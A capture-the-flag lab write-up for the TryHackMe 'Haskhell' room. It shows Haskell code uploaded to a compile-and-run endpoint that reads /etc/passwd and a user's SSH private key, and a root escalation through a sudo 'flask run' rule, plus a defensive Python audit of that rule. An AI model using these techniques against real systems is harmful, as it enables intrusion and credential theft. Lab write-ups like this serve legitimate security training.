THM - Haskhell
Show your professor that his PhD isn’t in security. Not much to go on there. Haskell is a programming language that I don’t know anything about. Let’s go!
nmap says we’ve got 22 (SSH) and 5001, which is a non-standard port.
5001/tcp open http syn-ack ttl 63 Gunicorn 19.7.1
Gunicorn is a ‘Python Web Server Gateway Interface HTTP server’ according to Wikipedia.
Visiting http://10.10.222.186:5001/ shows we have a webserver running on this port, to do with Functional Programming 220. There is a link to /homework1 which contains some instructions, and assigned work is supposed to be submitted to /upload. The upload function supposedly accepts Haskell files only. Unfortunately, the linked /upload returns a 404.
It also says that “Your file will be compiled and ran and all output will be piped to a file under the uploads directory.”
root@kali:/opt/tryhackme/haskhell# gobuster dir -u http://10.10.222.186:5001/ -w /usr/share/dirb/wordlists/common.txt
Running gobuster with the common wordlist reveals a page called /submit, and that appears to be what the /upload was supposed to be.
Creating a valid Haskell file (hello, world of course!), we can upload it:
main = putStrLn "Hello, World!"
And actually it gets shown to us: http://10.10.222.186:5001/uploads/fib.hs
[1 of 1] Compiling Main ( /home/flask/uploads/fib.hs, /home/flask/uploads/fib.o ) Linking /home/flask/uploads/fib …
So, what can we do with that??
Well, we can read a file for a start:
main :: IO ()
main = do
    s <- readFile "/etc/passwd"   -- runs as the web app's user, so we read whatever that user can
    doSomethingWith s

doSomethingWith :: String -> IO ()
doSomethingWith str = putStrLn str
Unfortunately we can’t open /etc/shadow :)
We can do some guessing - first I tried /home/prof/.profile, and that worked … so what if we try /home/prof/.ssh/id_rsa? Bingo!
I won’t paste it here, but we’ve got the private key for ‘prof’ and once we chmod 600 on it we can login:
root@kali:/opt/tryhackme/haskhell# ssh -i id_rsa prof@10.10.222.186
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
Prof has the user flag, so that’s sweet.
Running sudo -l, prof can do:
User prof may run the following commands on haskhell:
(root) NOPASSWD: /usr/bin/flask run
Flask is a micro web framework written in Python, so let’s make the most super basic Python thing you can imagine:
prof@haskhell:/root# cat /dev/shm/app.py
Now this isn’t a flask app, but it doesn’t matter. Next, we set our environment variable:
$ export FLASK_APP=app.py
And we do this:
prof@haskhell:/dev/shm$ sudo /usr/bin/flask run
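As an added defender-side check (my own code, not from the room or its author), the snippet below mirrors how `flask run` picks the module it imports: FLASK_APP if set, otherwise wsgi.py then app.py in the current directory (Flask 1.x/2.x discovery order, assumed here), and then reports whether that file or its directory is writable by a non-root user. It is the audit I would run against any `(root) NOPASSWD: /usr/bin/flask run` sudoers rule; the constructed scenario in demo() reproduces a world-writable sticky directory like /dev/shm.

```python
import os
import stat
import tempfile

# Lookup order `flask run` uses when FLASK_APP is unset (Flask >= 1.0):
# wsgi.py, then app.py, in the current working directory.
DEFAULT_APP_FILES = ("wsgi.py", "app.py")

def resolve_flask_app(env, cwd):
    """File `flask run` would import, mirroring Flask's lookup: FLASK_APP may be
    'app.py', 'pkg.module' or 'module:factory'; relative names resolve against
    cwd because the Flask CLI puts cwd on sys.path."""
    target = env.get("FLASK_APP")
    if target:
        module = target.split(":", 1)[0]
        if not module.endswith(".py"):
            module = module.replace(".", os.sep) + ".py"
        return os.path.normpath(os.path.join(cwd, module))
    for name in DEFAULT_APP_FILES:
        candidate = os.path.join(cwd, name)
        if os.path.isfile(candidate):
            return candidate
    return None

def audit_flask_run_as_root(env, cwd):
    """Findings for a `sudo ... flask run` rule: if the file root would import,
    or its directory, is writable by a non-root user, that user gets root."""
    path = resolve_flask_app(env, cwd)
    if path is None:
        return ["no app resolved; flask run would fail"]
    findings = ["root would import " + path]
    for p in (path, os.path.dirname(path)):
        if not os.path.exists(p):
            findings.append(p + " does not exist yet")
            continue
        st = os.stat(p)
        if st.st_uid != 0:
            findings.append(p + " is owned by uid %d, not root" % st.st_uid)
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(p + " is group/world writable")
    return findings

def demo():
    """Constructed scenario: app.py in a world-writable sticky directory like
    /dev/shm, FLASK_APP unset, cwd set to that directory."""
    with tempfile.TemporaryDirectory() as shm:
        os.chmod(shm, 0o1777)
        with open(os.path.join(shm, "app.py"), "w") as f:
            f.write("print('runs as whoever invoked flask run')\n")
        return audit_flask_run_as_root({}, shm)
```

Note that sudo's default env_reset drops FLASK_APP anyway; the cwd fallback is what makes the rule exploitable, so the fix is a sudoers rule that pins a root-owned app path (or no root flask at all), not env filtering.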
Boom. I had so little trouble with this I feel like I must’ve cheated by guessing the presence of id_rsa, and I didn’t consult any walkthroughs. Maybe I’m just levelling up.